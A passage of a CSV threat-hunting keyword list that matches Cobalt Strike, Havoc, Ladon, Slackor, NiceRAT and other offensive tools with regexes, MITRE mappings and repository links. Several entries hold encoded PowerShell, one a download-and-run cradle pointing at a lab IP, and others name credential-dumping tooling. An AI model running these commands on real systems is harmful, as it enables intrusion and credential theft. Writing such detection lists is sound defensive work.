APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*jump winrm *",".{0,1000}jump\swinrm\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*jump winrm*",".{0,1000}jump\swinrm.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*jump-exec psexec *",".{0,1000}jump\-exec\spsexec\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*jump-exec scshell*",".{0,1000}jump\-exec\sscshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*JumpSession_BOF-main*",".{0,1000}JumpSession_BOF\-main.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","9","1","77","12","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z" "*JunctionFolder.exe*",".{0,1000}JunctionFolder\.exe.{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*--just-clean*cleaning/to_clean.txt*",".{0,1000}\-\-just\-clean.{0,1000}cleaning\/to_clean\.txt.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*-just-dc-user not compatible in LOCAL mode*",".{0,1000}\-just\-dc\-user\snot\scompatible\sin\sLOCAL\smode.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*-just-dc-user switch is not supported in VSS mode*",".{0,1000}\-just\-dc\-user\sswitch\sis\snot\ssupported\sin\sVSS\smode.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*jweny/zabbix-saml-bypass-exp*",".{0,1000}jweny\/zabbix\-saml\-bypass\-exp.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/jweny/zabbix-saml-bypass-exp","1","1","N/A","N/A","1","95","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z" "*jwt_tool*",".{0,1000}jwt_tool.{0,1000}","offensive_tool_keyword","jwt_tool","jwt_tool.py is a toolkit for validating. forging. scanning and tampering JWTs (JSON Web Tokens).","T1210.001 - T1201 - T1059 - T1222","TA0002 - TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/ticarpi/jwt_tool","1","0","N/A","N/A","10","4977","632","2024-04-01T11:15:49Z","2017-01-23T21:13:50Z" "*-K lsass_loot*",".{0,1000}\-K\slsass_loot.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*-k -no-pass -p '' --auth-method kerberos*",".{0,1000}\-k\s\-no\-pass\s\-p\s\'\'\s\-\-auth\-method\skerberos.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*K1W1F01D3r(*",".{0,1000}K1W1F01D3r\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*K1W1F113(*",".{0,1000}K1W1F113\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*k4yt3x/orbitaldump*",".{0,1000}k4yt3x\/orbitaldump.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","453","89","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*K8_CS_*.rar*",".{0,1000}K8_CS_.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*k8gege.org/*",".{0,1000}k8gege\.org\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*k8gege/Ladon*",".{0,1000}k8gege\/Ladon.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*K8Ladon.sln*",".{0,1000}K8Ladon\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*KABHAGUAdAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIAAtAE4AYQBtAGUAIABBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAbgBhAG0AZQApACAALQBjAG8AbgB0AGEAaQBuAHMAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQAuAG4AYQBtAGUA*",".{0,1000}KABHAGUAdAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIAAtAE4AYQBtAGUAIABBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAbgBhAG0AZQApACAALQBjAG8AbgB0AGEAaQBuAHMAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQAuAG4AYQBtAGUA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA2ADcALwBjAGgAYQBwAHQAZQByADcALwByAHUAbgAuAHQAeAB0ACcAKQAgAHwAIABJAEUAWAA*",".{0,1000}KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA2ADcALwBjAGgAYQBwAHQAZQByADcALwByAHUAbgAuAHQAeAB0ACcAKQAgAHwAIABJAEUAWAA.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*kali-*.deb*",".{0,1000}kali\-.{0,1000}\.deb.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-anonsurf*",".{0,1000}kali\-anonsurf.{0,1000}","offensive_tool_keyword","kali-anonsurf","Anonsurf will anonymize the entire system under TOR using IPTables. It will also allow you to start and stop i2p as well.","T1568 - T1102 - T1055 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Und3rf10w/kali-anonsurf","1","1","N/A","N/A","10","1417","445","2023-12-21T00:42:17Z","2015-08-19T04:57:16Z" "*KaliLadon.*",".{0,1000}KaliLadon\..{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*kali-linux*.7z*",".{0,1000}kali\-linux.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux*.img*",".{0,1000}kali\-linux.{0,1000}\.img.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux*.iso*",".{0,1000}kali\-linux.{0,1000}\.iso.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*.torrent*",".{0,1000}kali\-linux\-.{0,1000}\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*.vmdk*",".{0,1000}kali\-linux\-.{0,1000}\.vmdk.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*.vmwarevm*",".{0,1000}kali\-linux\-.{0,1000}\.vmwarevm.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*.vmx*",".{0,1000}kali\-linux\-.{0,1000}\.vmx.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*-installer-amd64.iso*",".{0,1000}kali\-linux\-.{0,1000}\-installer\-amd64\.iso.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*-installer-everything-amd64.iso.torrent*",".{0,1000}kali\-linux\-.{0,1000}\-installer\-everything\-amd64\.iso\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*-live-everything-amd64.iso.torrent*",".{0,1000}kali\-linux\-.{0,1000}\-live\-everything\-amd64\.iso\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*-raspberry-pi-armhf.img.xz*",".{0,1000}kali\-linux\-.{0,1000}\-raspberry\-pi\-armhf\.img\.xz.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*-virtualbox-amd64.ova*",".{0,1000}kali\-linux\-.{0,1000}\-virtualbox\-amd64\.ova.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*-vmware-amd64.7z*",".{0,1000}kali\-linux\-.{0,1000}\-vmware\-amd64\.7z.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kalilinux/kali-rolling*",".{0,1000}kalilinux\/kali\-rolling.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*kalilinux/kali-rolling*",".{0,1000}kalilinux\/kali\-rolling.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kalitorify*",".{0,1000}kalitorify.{0,1000}","offensive_tool_keyword","kalitorify","kalitorify is a shell script for Kali Linux which use iptables settings to create a Transparent Proxy through the Tor Network. the program also allows you to perform various checks like checking the Tor Exit Node (i.e. your public IP when you are under Tor proxy). or if Tor has been configured 